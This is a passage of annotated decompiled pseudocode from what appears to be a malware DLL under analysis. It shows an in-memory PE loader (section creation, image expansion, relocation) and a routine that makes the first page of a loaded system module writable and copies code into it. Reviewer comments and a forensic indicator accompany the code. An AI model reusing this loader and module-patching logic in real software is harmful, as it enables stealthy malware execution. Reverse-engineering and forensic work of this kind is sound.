  (*(void (__stdcall **)(int))(v8 + 28))(v7);
  return v6;
}
// 10003C3A: using guessed type int dword_10003C3A;

//----- (10003E22) --------------------------------------------------------
// Routine stored at header offset +0 by sub_1000335E. Through table slot +20
// it looks up, in the module whose handle is at block offset +128, the item
// identified by block offset +148, and calls it with the {address, size} pair
// stored at block offsets +132/+136. If the lookup fails it calls slot +40 on
// the module handle instead. Always returns 0.
// NOTE(review): slots +20 and +40 have the shapes of GetProcAddress and
// FreeLibrary -- TODO confirm.
int __stdcall sub_10003E22(int a1)
{
  int result; // eax@2
  int v2; // [sp+0h] [bp-Ch]@1
  int v3; // [sp+4h] [bp-8h]@1
  unsigned int v4; // [sp+8h] [bp-4h]@1

  v3 = *(_DWORD *)(a1 + 32);
  v4 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9;
  v2 = (*(int (__stdcall **)(_DWORD, _DWORD))(v4 + 20))(*(_DWORD *)(v3 + 128), *(_DWORD *)(v3 + 148));
  if (
v2 )
  {
    // Lookup succeeded: call the export with the extra blob's address and size.
    ((void (__cdecl *)(_DWORD, _DWORD))v2)(*(_DWORD *)(v3 + 132), *(_DWORD *)(v3 + 136));
    result = 0;
  }
  else
  {
    (*(void (__stdcall **)(_DWORD))(v4 + 40))(*(_DWORD *)(v3 + 128));
    result = 0;
  }
  return result;
}
// 10003C3A: using guessed type int dword_10003C3A;

//----- (10003E95) --------------------------------------------------------
// Fills a 48-byte record at a1+80 from the PE headers at a2 (a2 points at the
// 'PE' signature) and returns its address. The source offsets correspond to
// standard PE32 header fields:
//   +40 + +52  AddressOfEntryPoint + ImageBase   -> record +0
//   +96 / +100 SizeOfStackReserve / Commit       -> record +8 / +12
//   +92        Subsystem                         -> record +16
//   +74 / +72  Minor / MajorSubsystemVersion     -> record +20 / +22
//   +22        Characteristics                   -> record +28
//   +94        DllCharacteristics                -> record +30
//   +4         Machine                           -> record +32
//   +112       LoaderFlags                       -> record +36
//   a3                                           -> record +40
// NOTE(review): the record layout resembles SECTION_IMAGE_INFORMATION -- TODO
// confirm.
int __cdecl sub_10003E95(int a1, int a2, int a3)
{
  int result; // eax@1

  *(_DWORD *)(a1 + 80) = *(_DWORD *)(a2 + 40) + *(_DWORD *)(a2 + 52);
  *(_DWORD *)(a1 + 84) = 0;
  *(_DWORD *)(a1 + 88) = *(_DWORD *)(a2 + 96);
  *(_DWORD *)(a1 + 92) = *(_DWORD *)(a2 + 100);
  *(_DWORD *)(a1 + 96) = *(_WORD *)(a2 + 92);
  *(_WORD *)(a1 + 100) = *(_WORD *)(a2 + 74);
  *(_WORD *)(a1 + 102) = *(_WORD *)(a2 + 72);
  *(_DWORD *)(a1 + 104) = 0;
  *(_WORD *)(a1 + 108) = *(_WORD *)(a2 + 22);
  *(_WORD *)(a1 + 110) = *(_WORD *)(a2 + 94);
  *(_WORD *)(a1 + 112) = *(_WORD *)(a2 + 4);
  *(_BYTE *)(a1 + 114) = 1;
  *(_BYTE *)(a1 + 115) = 4;
  *(_DWORD *)(a1 + 116) = *(_DWORD *)(a2 + 112);
  *(_DWORD *)(a1 + 120) = a3;
  result = a1 + 80;
  *(_DWORD *)(a1 + 124) = 0;
  return result;
}

//----- (10003F58) --------------------------------------------------------
// Applies base relocations to a mapped PE image. a1 points to a dword holding
// the image's load address (v8).
//   - Requires an 'MZ' header (23117); otherwise returns -1073741819
//     (0xC0000005).
//   - If the header's ImageBase (PE signature +52) already equals the load
//     address, returns 0.
//   - Otherwise stores the new ImageBase and walks the relocation directory
//     (address at +160, size at +164): for every entry of type 3 it adds the
//     delta v7 to the dword at block address + 12-bit offset; type 0 entries
//     are skipped; any other type, an odd block size or an empty directory
//     returns -1073741800 (0xC0000018).
// NOTE(review): block sizes and offsets come from the image and are not
// checked against the image size.
signed int __stdcall sub_10003F58(int a1)
{
  signed int result; // eax@3
  int v2; // ST08_4@20
  int v3; // [sp+8h] [bp-24h]@12
  unsigned int v4; // [sp+Ch] [bp-20h]@12
  unsigned int j; // [sp+10h] [bp-1Ch]@14
  int v6; // [sp+18h] [bp-14h]@6
  int v7; // [sp+1Ch] [bp-10h]@6
  int v8; // [sp+24h] [bp-8h]@4
  int i; // [sp+28h] [bp-4h]@10

  if ( a1 && *(_DWORD *)a1 )
  {
    v8 = *(_DWORD *)a1;
    if ( **(_WORD **)a1 == 23117 )
    {
      v6 = *(_DWORD *)(*(_DWORD *)a1 + 60) + v8;
      v7 = v8 - *(_DWORD *)(v6 + 52);
      if ( v8 == *(_DWORD *)(v6 + 52) )
      {
        result = 0;
      }
      else
      {
        *(_DWORD *)(v6 + 52) = v8;
        if ( *(_DWORD *)(v6 + 164) )
        {
          for ( i = *(_DWORD *)(v6 + 160) + v8; *(_DWORD *)(i + 4); i += *(_DWORD *)(i + 4) )
          {
            // Each block: 8-byte header {page RVA, block size}, then 16-bit
            // entries.
            v4 = *(_DWORD *)(i + 4) - 8;
            v3 = i + 8;
            if ( v4 % 2 )
              return -1073741800;
            for ( j = 0; j < v4 >> 1; ++j )
            {
              if ( (unsigned __int8)(*(_WORD *)v3 >> 8) >> 4 )
              {
                if (
(unsigned __int8)(*(_WORD *)v3 >> 8) >> 4 != 3 )
                  return -1073741800;
                // Type 3 entry: add the load delta v7 to the dword at
                // block address + low 12 bits of the entry.
                v2 = (*(_WORD *)v3 & 0xFFF) + *(_DWORD *)i + v8;
                *(_DWORD *)v2 += v7;
              }
              v3 += 2;
            }
          }
          result = 0;
        }
        else
        {
          result = -1073741800;
        }
      }
    }
    else
    {
      result = -1073741819;
    }
  }
  else
  {
    result = -1073741819;
  }
  return result;
}

//----- (100040B7) --------------------------------------------------------
// Plain memcpy wrapper. It lies inside the code range that sub_1000335E
// copies, unlike the otherwise identical sub_10003774.
void __cdecl sub_100040B7(void *a1, const void *a2, unsigned int a3)
{
  memcpy(a1, a2, a3);
}

//----- (100040CB) --------------------------------------------------------
// Expands a raw PE file into its in-memory layout.
//   a1 - raw file bytes, a2 - pointer to its 'PE' signature, a3 - destination
// Copies the headers (length at a2+84, SizeOfHeaders), then for each of the
// section-table entries (count at a2+6, table at a2 + 24 + the word at a2+20,
// 40 bytes each) copies SizeOfRawData bytes (entry +16) from file offset
// PointerToRawData (entry +20) to destination offset VirtualAddress
// (entry +12). Returns the number of sections processed.
// NOTE(review): none of the sizes or offsets is validated against the source
// or destination size.
int __cdecl sub_100040CB(const void *a1, int a2, void *a3)
{
  int result; // eax@2
  int v4; // [sp+0h] [bp-Ch]@1
  int v5; // [sp+4h] [bp-8h]@1
  int v6; // [sp+8h] [bp-4h]@1

  v4 = *(_WORD *)(a2 + 6);
  sub_100040B7(a3, a1, *(_DWORD *)(a2 + 84));
  v5 = a2 + *(_WORD *)(a2 + 20) + 24;
  v6 = 0;
  while ( 1 )
  {
    result = v6;
    if ( v6 >= v4 )
      break;
    if ( *(_DWORD *)(v5 + 16) )
      sub_100040B7((char *)a3 + *(_DWORD *)(v5 + 12), (char *)a1 + *(_DWORD *)(v5 + 20), *(_DWORD *)(v5 + 16));
    ++v6;
    v5 += 40;
  }
  return result;
}

//----- (1000414D) --------------------------------------------------------
// Installs the helper code once per process.
//   a1 - 36-byte block header, a2 - relocated copy of the API pointer table
// *a2 is the handle (base address) of the module resolved by sub_10003708.
// If the dword at offset 64 of that module already holds the marker
// -1421275077, or the handle is 0, nothing is done. Otherwise the first 4096
// bytes of the module are made writable through slot +16 (protection value
// 128), the data range described at a1+24/a1+28 is copied to offset 64, the
// routine at *(a1+8) is called with that address, and slot +32 is called with
// (-1, 0, 0). Returns 0 on success, -4 if the protection change fails.
// Analyst note: the first page of a loaded system module normally matches the
// file on disk; a difference starting at offset 0x40 is a memory-forensics
// indicator of this step.
// NOTE(review): slot +32 called with (-1, 0, 0) has the shape of
// FlushInstructionCache for the current process -- TODO confirm.
signed int __cdecl sub_1000414D(int a1, int a2)
{
  signed int result; // eax@2
  int v3; // [sp+8h] [bp-Ch]@1
  void *v4; // [sp+Ch] [bp-8h]@3
  char v5; // [sp+10h] [bp-4h]@5

  v3 = *(_DWORD *)a2;
  if ( *(_DWORD *)a2 )
  {
    v4 = (void *)(v3 + 64);
    if ( *(_DWORD *)(v3 + 64) == -1421275077 )
    {
      result = 0;
    }
    else
    {
      if ( (*(int (__stdcall **)(int, signed int, signed int, char *))(a2 + 16))(v3, 4096, 128, &v5) )
      {
        sub_100040B7(v4, *(const void **)(a1 + 24), *(_DWORD *)(a1 + 28));
        (*(void (__thiscall **)(void *))(a1 + 8))(v4);
        (*(void (__stdcall **)(signed int, _DWORD, _DWORD))(a2 + 32))(-1, 0, 0);
        result = 0;
      }
      else
      {
        result = -4;
      }
    }
  }
  else
  {
    result = 0;
  }
  return result;
}

//----- (100041EB) --------------------------------------------------------
// Builds a memory object that holds the expanded PE image a3.
//   a1 - relocated API pointer table, a2 - descriptor, a4 - stored in the
//   record filled by sub_10003E95
// Validates the 'MZ' (23117) and 'PE' (17744) signatures (-2 otherwise),
// creates an object of SizeOfImage bytes (PE signature +80) through slot +44
// (-11 on failure), maps it through slot +24 (-10 on failure, after releasing
// the handle through slot +64), expands the image into it (sub_100040CB),
// fills the image-information record (sub_10003E95), releases the view through
// slot +28 and leaves the object handle in the descriptor at a2+8.
// Returns 0 on success.
// NOTE(review): slot +44 takes the same arguments as the section-creation call
// in sub_10002F0F; slot +24 called with access 6 has the shape of
// MapViewOfFile -- TODO confirm.
signed int __cdecl sub_100041EB(int a1, int a2, const void *a3, int a4)
{
  signed int result; // eax@2
  int v5; // [sp+0h] [bp-1Ch]@3
  int v6; // [sp+4h]
[bp-18h]@5
  int v7; // [sp+8h] [bp-14h]@5
  int v8; // [sp+Ch] [bp-10h]@5
  int v9; // [sp+10h] [bp-Ch]@7
  int v10; // [sp+14h] [bp-8h]@5
  const void *v11; // [sp+18h] [bp-4h]@1

  *(_DWORD *)(a2 + 8) = 0;
  v11 = a3;
  // 23117 = 'MZ'; dword index 15 is the header offset stored at byte 60.
  if ( *(_WORD *)a3 == 23117 )
  {
    v5 = (int)((char *)a3 + *((_DWORD *)v11 + 15));
    // 17744 = 'PE\0\0'
    if ( *(_DWORD *)v5 == 17744 )
    {
      // v6/v7 form a 64-bit size: low = SizeOfImage, high = 0.
      v6 = *(_DWORD *)(v5 + 80);
      v7 = 0;
      v8 = (*(int (__stdcall **)(int *, signed int, _DWORD, int *, signed int, signed int, _DWORD))(a1 + 44))(
             &v10,
             983071,
             0,
             &v6,
             64,
             134217728,
             0);
      if ( v8 )
      {
        result = -11;
      }
      else
      {
        v9 = (*(int (__stdcall **)(int, signed int, _DWORD, _DWORD, _DWORD))(a1 + 24))(v10, 6, 0, 0, 0);
        if ( v9 )
        {
          // Keep the object handle in the descriptor; the caller releases it.
          *(_DWORD *)(a2 + 8) = v10;
          sub_100040CB(a3, v5, (void *)v9);
          sub_10003E95(a2, v5, a4);
          (*(void (__stdcall **)(int))(a1 + 28))(v9);
          result = 0;
        }
        else
        {
          (*(void (__stdcall **)(int))(a1 + 64))(v10);
          result = -10;
        }
      }
    }
    else
    {
      result = -2;
    }
  }
  else
  {
    result = -2;
  }
  return result;
}

//----- (100042CC) --------------------------------------------------------
// Empty function. Its address marks the end of the code range measured by
// sub_10003327.
void __cdecl sub_100042CC()
{
  ;
}

#error "There were 2 decompilation failure(s) on 79 function(s)"